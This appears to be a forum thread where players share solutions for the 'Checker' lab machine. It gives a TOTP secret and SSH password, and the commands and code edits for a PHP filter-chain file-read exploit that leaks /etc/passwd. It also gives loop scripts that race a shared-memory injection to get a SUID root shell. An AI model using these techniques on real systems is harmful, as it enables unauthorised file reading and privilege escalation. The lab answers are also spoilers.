Posts: 124
Threads: 1
Joined: Apr 2024
(Feb 23, 2025, 09:25 AM)x1rx Wrote: (Feb 23, 2025, 01:11 AM)0xbeef Wrote: (Feb 23, 2025, 01:08 AM)v3701 Wrote: (Feb 23, 2025, 12:30 AM)RedBlock Wrote: On
https://it-tools.tech/otp-generator
Use the secret
DVDBRAODLCWF7I2ONA4K5LQLUE
then ssh reader@checker.htb:hiccup-publicly-genesis
You will get user.txt
How did you find the secret ?
In this file /backup/home_backup/home/reader/.google_authenticator
how did you find "/backup/home_backup/home/reader/.google_authenticator"
i want to know that too as /home/reader/.google_authenticator isn't readable by exploit
Posts: 21
Threads: 0
Joined: Apr 2024
(Feb 23, 2025, 09:30 AM)jsvensson Wrote: (Feb 23, 2025, 09:25 AM)x1rx Wrote: (Feb 23, 2025, 01:11 AM)0xbeef Wrote: (Feb 23, 2025, 01:08 AM)v3701 Wrote: (Feb 23, 2025, 12:30 AM)RedBlock Wrote: On
https://it-tools.tech/otp-generator
Use the secret
DVDBRAODLCWF7I2ONA4K5LQLUE
then ssh reader@checker.htb:hiccup-publicly-genesis
You will get user.txt
How did you find the secret ?
In this file /backup/home_backup/home/reader/.google_authenticator
how did you find "/backup/home_backup/home/reader/.google_authenticator"
i want to know that too as /home/reader/.google_authenticator isn't readable by exploit
You can find it at the page http://checker.htb/books/linux-security/...up-with-cp
Posts: 41
Threads: 2
Joined: Sep 2023
(Feb 23, 2025, 09:30 AM)jsvensson Wrote: (Feb 23, 2025, 09:25 AM)x1rx Wrote: (Feb 23, 2025, 01:11 AM)0xbeef Wrote: (Feb 23, 2025, 01:08 AM)v3701 Wrote: (Feb 23, 2025, 12:30 AM)RedBlock Wrote: On
https://it-tools.tech/otp-generator
Use the secret
DVDBRAODLCWF7I2ONA4K5LQLUE
then ssh reader@checker.htb:hiccup-publicly-genesis
You will get user.txt
How did you find the secret ?
In this file /backup/home_backup/home/reader/.google_authenticator
how did you find "/backup/home_backup/home/reader/.google_authenticator"
i want to know that too as /home/reader/.google_authenticator isn't readable by exploit
read blogpost where they say you to copy it insecure way
Posts: 42
Threads: 1
Joined: Oct 2024
(Feb 23, 2025, 04:43 AM)idontevensmokebro Wrote: Can to make LFI work? Keep getting `binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4`
Updated requestor.py
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
$ py filters_chain_oracle_exploit.py --target 'http://checker.htb/ajax/page/9/save-draft' --data '{"name":"POC"}' --verb PUT --headers "$(cat headers.json)" --file /etc/passwd --parameter html --time_based_attack True --proxy http://127.0.0.1:8080
[*]The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*]The following local file is leaked : /etc/passwd
[*]Running PUT requests
[*]Additionnal data used : {"name":"POC"}
[*]Additionnal headers used : {
"Cookie": "teampass_session=...; jstree_select=1; XSRF-TOKEN=...; bookstack_session=...",
"X-CSRF-TOKEN": "nk9IAZ4bH9CTlwJjtb3rZAiEy5l5XtXv0Ogv06B9"
}
[+] Error handling duration : -0.179906
[*]Trying the process in a warning friendly way
Traceback (most recent call last):
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
filters_chain_oracle.main()
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
self.bruteforcer.bruteforce()
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
for self.base64, self.data in super().bruteforce():
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
decoded = b64decode(self.pad_base64(base64))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/base64.py", line 88, in b64decode
return binascii.a2b_base64(s, strict_mode=validate)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4
Sometimes it works with `--delay 0.4`, but doesn't leak anything correctly.
Got stuck here.
Why is your X-CSRF-TOKEN so short? Burp show mine as 'aseyJpdiI6Im1oZXZQYkR6dUVsY0xPeGZjQzJVZGc9PSIsInZhbHVlIjoidmNtR2FDSFN5TENsdUcvNHc0ZFBtSjZPdFVZV0VYbTdaQnRPeVpIdXFvRWVHN1BnTktVbnMzbzJjelBFZkY5ekVVQkd4OWhrZXR6OGRzdmtBV3R1SFJVOUwwZGhPVmlMdDJxeWFPMUVBeUdDZ1FHeThwVERZdDlhc1NnOFlVSDkiLCJtYWMiOiIxMzY5ZjQ5N2I1Y2FlMDg1MTZhYmMxODg5OGFjZGNhMGE5Y2E0NDIwN2QzMTVjOWVlMjk3OGU2NjZkMTE0ZDI4IiwidGFnIjoiIn0%3D' this long. Is this the reason I'm getting the error?
Posts: 7
Threads: 0
Joined: Feb 2025
Can someone plz provide the steps to get the LFI working using filters_chain_oracle_exploit.py ?
Posts: 17
Threads: 0
Joined: Apr 2024
(Feb 23, 2025, 04:43 AM)idontevensmokebro Wrote: Can to make LFI work? Keep getting `binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4`
Updated requestor.py
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
$ py filters_chain_oracle_exploit.py --target 'http://checker.htb/ajax/page/9/save-draft' --data '{"name":"POC"}' --verb PUT --headers "$(cat headers.json)" --file /etc/passwd --parameter html --time_based_attack True --proxy http://127.0.0.1:8080
[*]The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*]The following local file is leaked : /etc/passwd
[*]Running PUT requests
[*]Additionnal data used : {"name":"POC"}
[*]Additionnal headers used : {
"Cookie": "teampass_session=...; jstree_select=1; XSRF-TOKEN=...; bookstack_session=...",
"X-CSRF-TOKEN": "nk9IAZ4bH9CTlwJjtb3rZAiEy5l5XtXv0Ogv06B9"
}
[+] Error handling duration : -0.179906
[*]Trying the process in a warning friendly way
Traceback (most recent call last):
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
filters_chain_oracle.main()
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
self.bruteforcer.bruteforce()
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
for self.base64, self.data in super().bruteforce():
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
decoded = b64decode(self.pad_base64(base64))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/base64.py", line 88, in b64decode
return binascii.a2b_base64(s, strict_mode=validate)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4
Sometimes it works with `--delay 0.4`, but doesn't leak anything correctly.
you need to make sure that you have content-type set to application/json and that you use --json=1. You will also get that error if the file doesn't exist
Posts: 1
Threads: 0
Joined: Feb 2025
(Feb 24, 2025, 10:46 AM)ZenMunk3y Wrote: (Feb 23, 2025, 04:43 AM)idontevensmokebro Wrote: Can to make LFI work? Keep getting `binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4`
Updated requestor.py
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
$ py filters_chain_oracle_exploit.py --target 'http://checker.htb/ajax/page/9/save-draft' --data '{"name":"POC"}' --verb PUT --headers "$(cat headers.json)" --file /etc/passwd --parameter html --time_based_attack True --proxy http://127.0.0.1:8080
[*]The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*]The following local file is leaked : /etc/passwd
[*]Running PUT requests
[*]Additionnal data used : {"name":"POC"}
[*]Additionnal headers used : {
"Cookie": "teampass_session=...; jstree_select=1; XSRF-TOKEN=...; bookstack_session=...",
"X-CSRF-TOKEN": "nk9IAZ4bH9CTlwJjtb3rZAiEy5l5XtXv0Ogv06B9"
}
[+] Error handling duration : -0.179906
[*]Trying the process in a warning friendly way
Traceback (most recent call last):
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
filters_chain_oracle.main()
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
self.bruteforcer.bruteforce()
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
for self.base64, self.data in super().bruteforce():
File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
decoded = b64decode(self.pad_base64(base64))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/base64.py", line 88, in b64decode
return binascii.a2b_base64(s, strict_mode=validate)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4
Sometimes it works with `--delay 0.4`, but doesn't leak anything correctly.
you need to make sure that you have content-type set to application/json and that you use --json=1. You will also get that error if the file doesn't exist
SSRF not working anymore. I did every thing mentioned still receiving the same error
python3 filters_chain_oracle_exploit.py --target http://checker.htb/ajax/page/8/save-draft --file '/etc/passwd' --verb PUT --parameter html --headers '{"X-CSRF-TOKEN":"LyRqi6GjdLyhfdISb0ms5UUCS6e69Z76EmPgEEbX","Content-Type":"application/json","Referer":"http://checker.htb/books/test/draft/8","Cookie":"XSRF-TOKEN=eyJpdiI6IlNsa2VtLzQxZFhoN2IycHN3bldiUWc9PSIsInZhbHVlIjoiK3J5VjRGU3JiK1hvR0JLVXFoUHI0RDd1SXFUWXRNdzAzRFRKRmlFeHNUc1kxSXN4bzlLZ2lGRTdWZVJ2aVl3STVvamd1d0dyWEJNcnpvdXRlV2Q0U0dVeUhvZGpmQjQ2bWswTE1wdldybWxVS0V1TDFkaHRUQ25QM3pFN1kxa00iLCJtYWMiOiIyOGI1NDU1MjFhMzU5YzY2OTY1YmEzN2JmYzFkYWRmMmM5NTNmNmM4OTU0MGQ2ZjZhYTA5ZGM3OTkyOTRiOTJjIiwidGFnIjoiIn0%3D; bookstack_session=eyJpdiI6InZIWDdzS1hZM092NHVjSmt1MnJnZGc9PSIsInZhbHVlIjoiV2I2ZnozeXQ5WFNrc2JwUFpMNk9IcTFWMlo5ejlKazlLNTAzVnlFQnZ1dGdwSDhUbDExc0JnVnZvUzlkY2NkZk1SblB4dUlwUklBQXBIcE4rN2VvYWEzMGdaNUFsMGhtMU0zbVorL3JhdUhaWG0yWE9qdUtTc09oSGMwWGhVdVAiLCJtYWMiOiIxYWViNzU0NDk5ZjI1ZDhiYjcwMDU4NTgwYzBmYjY3OTBiNGJiYmQ1ZjNhYTE3MTI2ZmU0YmViZTBmYTVmOGVkIiwidGFnIjoiIn0%3D"}' --proxy http://127.0.0.1:8080 --time_based_attack True --json=1
The following URL is targeted : http://checker.htb/ajax/page/8/save-draft
The following local file is leaked : /etc/passwd
Running PUT requests
Additionnal headers used : {"X-CSRF-TOKEN":"LyRqi6GjdLyhfdISb0ms5UUCS6e69Z76EmPgEEbX","Content-Type":"application/json","Referer":"http://checker.htb/books/test/draft/8","Cookie":"XSRF-TOKEN=eyJpdiI6IlNsa2VtLzQxZFhoN2IycHN3bldiUWc9PSIsInZhbHVlIjoiK3J5VjRGU3JiK1hvR0JLVXFoUHI0RDd1SXFUWXRNdzAzRFRKRmlFeHNUc1kxSXN4bzlLZ2lGRTdWZVJ2aVl3STVvamd1d0dyWEJNcnpvdXRlV2Q0U0dVeUhvZGpmQjQ2bWswTE1wdldybWxVS0V1TDFkaHRUQ25QM3pFN1kxa00iLCJtYWMiOiIyOGI1NDU1MjFhMzU5YzY2OTY1YmEzN2JmYzFkYWRmMmM5NTNmNmM4OTU0MGQ2ZjZhYTA5ZGM3OTkyOTRiOTJjIiwidGFnIjoiIn0%3D; bookstack_session=eyJpdiI6InZIWDdzS1hZM092NHVjSmt1MnJnZGc9PSIsInZhbHVlIjoiV2I2ZnozeXQ5WFNrc2JwUFpMNk9IcTFWMlo5ejlKazlLNTAzVnlFQnZ1dGdwSDhUbDExc0JnVnZvUzlkY2NkZk1SblB4dUlwUklBQXBIcE4rN2VvYWEzMGdaNUFsMGhtMU0zbVorL3JhdUhaWG0yWE9qdUtTc09oSGMwWGhVdVAiLCJtYWMiOiIxYWViNzU0NDk5ZjI1ZDhiYjcwMDU4NTgwYzBmYjY3OTBiNGJiYmQ1ZjNhYTE3MTI2ZmU0YmViZTBmYTVmOGVkIiwidGFnIjoiIn0%3D"}
[+] Error handling duration : -0.03959800000000002
Trying the process in a warning friendly way
Traceback (most recent call last):
File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
filters_chain_oracle.main()
File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
self.bruteforcer.bruteforce()
File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
for self.base64, self.data in super().bruteforce():
^^^^^^^^^^^^^^^^^^^^
File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
decoded = b64decode(self.pad_base64(base64))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/base64.py", line 88, in b64decode
return binascii.a2b_base64(s, strict_mode=validate)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4
Every time I use receive this error I have also changed below in the code
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
Still receiving this error any solutions please and can anyone check where they are still able to read file with it.
Posts: 47
Threads: 1
Joined: Nov 2024
Thanks for all the help, you guys rock as always!
Posts: 9
Threads: 0
Joined: Jul 2024
(Feb 24, 2025, 02:40 PM)blasphemer Wrote: filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
try to use the other endpoint. had lots of trouble with that one.... that error will still happen from time to time but you should be able to extract something
Posts: 33
Threads: 1
Joined: Oct 2024
(Feb 23, 2025, 03:26 AM)slimeylimey Wrote: For root, you can compile and use the previously mentioned C file (assume located at /tmp/exploit), then do this if you are having issues:
/tmp/loop-exploit.sh
#!/bin/bash
while true; do
/tmp/exploit
done
/tmp/loop-check.sh
#!/bin/bash
while true; do
sudo /opt/hash-checker/check-leak.sh bob
done
Run both of these scripts simultaneously, at some point, the stars will align and the injected data in RW shared memory will be executed via popen().
After some time, you can run /bin/bash -p and drop into a root shell, having set the SUID bit on it.
Cheers.
How did you come up with something like this, and where did u found the poc u sent bellow?
|
